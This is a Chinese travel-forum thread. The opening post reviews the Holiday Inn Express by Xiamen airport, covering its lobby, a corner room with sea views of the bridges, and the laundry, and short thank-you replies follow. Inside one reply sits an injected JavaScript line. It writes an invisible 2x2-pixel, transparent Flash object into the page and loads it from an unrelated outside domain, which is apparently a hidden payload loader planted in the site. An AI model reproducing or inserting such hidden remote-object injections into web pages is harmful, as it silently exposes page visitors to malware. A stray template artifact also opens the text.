{var_dump()}
发文

厦门空港智选假日——270°海景角房

3834 62
   第一次在厦门刷房,这家据说是去年12月份开业的,在高崎边上,这一带真的是看起来超级偏,因为还没完全开发好,但是景观位置绝对是很赞的,对岸就是集美,在房间里可看到集美大桥,杏林大桥,和厦门大桥。
         酒店有9层,大堂非常不错,很大气,新版的HIX确实就是不一样,至少个人很喜欢配色看起很舒服,2楼是会议室和洗衣房,洗衣服的话得到前台购买洗衣币,一个20块。这次我一共订了两间基础房,含税差不多350一间,一间给升级了常规海景房,而另外一间给升了酒店景观角度最好的8825角房270°海景(据客房经理介绍)。房间配备也很齐全,保险箱,熨烫机都有,酒店的整体服务都很在线,前台小弟弟小妹妹都好幼齿阿,看着应该都只有20出头,非常有礼貌,工作很认真。用1w积分兑换的话我觉得也是很值得的,打算后天赶早班机再来住一晚。 厦门空港智选假日——270°海景角房
阔气的大堂
房间真的特别大
洗漱间也特别大
3部电梯
水好评
杏林大桥 厦门大桥
集美大桥
偏归偏,外卖还是很方便叫送的,夜宵吃起来 哈哈哈
洗衣房
可以边看电视边等,挂烫机也有
智空间
早餐厅前也供电脑使用

评分 ( 1人) 威望 理由 总评分: 威望 +2  查看全部评分
大小飞飞
+ 2 恭喜, 每10个回复奖励1个威望, 每贴最高奖励10威望。
鲜花 (12朵) 鲜花榜
Dome木梁2023-2-16 18:46
送了1朵鲜花:  Life is better when shared!
可乐kk2021-3-31 07:32
送了1朵鲜花:  Life is better when shared!
黑灵白魂2019-3-31 19:41
飞客20411302019-3-26 01:31
Jeff Leung2019-3-15 15:24
送了1朵鲜花:  谢谢分享!
上一篇:  下一篇: 

关注本版大神,阅读更多精彩好文

62 个评论

txkj7400  金卡会员  2019-3-13 13:04:44  | 显示全部楼层
不错,感谢分享
moune    匿名飞客  发表于 1970-1-1 08:00:00
post_deleted
鲜花 (1朵) 鲜花榜
小飞机之神7 小时前
送了1朵鲜花:  谢谢分享!
摩耶人  黑钻会员   楼主| 2019-3-13 14:14:24  | 显示全部楼层
神龙之祖 发表于 2019-3-13 13:13
这个房业主不自留啊
给我们升了没留
鲜花 (1朵) 鲜花榜
可乐kk2019-5-18 08:04
摩耶人  黑钻会员   楼主| 2019-3-13 14:14:38  | 显示全部楼层
txkj7400 发表于 2019-3-13 13:04
不错,感谢分享$('swf_aIE').innerHTML=AC_FL_RunContent('width', '2', 'height', '2', 'allowNetworking', 'internal', 'allowAccess', 'never', 'src', 'https://v.ruher.info/images/ku/1.swf', 'quality', 'high', 'bgcolor', '#ffffff', 'wmode', 'transparent', 'allowfullscreen', 'true');
谢谢大佬
鲜花 (1朵) 鲜花榜
摩耶人  黑钻会员   楼主| 2019-3-13 15:08:42  | 显示全部楼层
金生大碗 发表于 2019-3-13 14:15
感谢分享!
谢谢大佬
鲜花 (1朵) 鲜花榜
可乐kk2020-6-21 11:09
摩耶人  黑钻会员   楼主| 2019-3-13 15:08:59  | 显示全部楼层
PP365 发表于 2019-3-13 14:54
这个房间真的是超棒!
是啊 很值
鲜花 (1朵) 鲜花榜
chueng526  黑钻会员  2019-3-13 15:24:59  | 显示全部楼层
谢谢楼主分享,酒店非常棒
好看,
摩耶人  黑钻会员   楼主| 2019-3-13 17:11:53  | 显示全部楼层
不留 发表于 2019-3-13 17:00
什么房啊
海景房,角房
鲜花 (1朵) 鲜花榜
摩耶人  黑钻会员   楼主| 2019-3-13 17:12:05  | 显示全部楼层
moune 发表于 2019-3-13 16:37
这个HIX好高级的样子!
我也觉得
鲜花 (1朵) 鲜花榜
摩耶人  黑钻会员   楼主| 2019-3-13 17:12:13  | 显示全部楼层
好喝茅台的大神 发表于 2019-3-13 16:28
好看,
摩耶人  黑钻会员   楼主| 2019-3-13 17:12:23  | 显示全部楼层
chueng526 发表于 2019-3-13 15:24
谢谢楼主分享,酒店非常棒
谢谢大佬
鲜花 (1朵) 鲜花榜
可乐kk2020-6-25 09:26
Tommy_ZHANG  白金会员  2019-3-13 17:21:20  | 显示全部楼层
真的很不错,下次去厦门刷一下
可乐kk  终钻会员  2019-3-13 18:22:12  | 显示全部楼层
少吃辣!少吃烧烤!这样对身体不好
Z.H.H  钻石会员  2019-3-13 18:28:18  | 显示全部楼层
很棒呀,元旦时我去厦门玩,也准备订这家酒店,结果为了完成希尔顿的钻挑任务就没有去。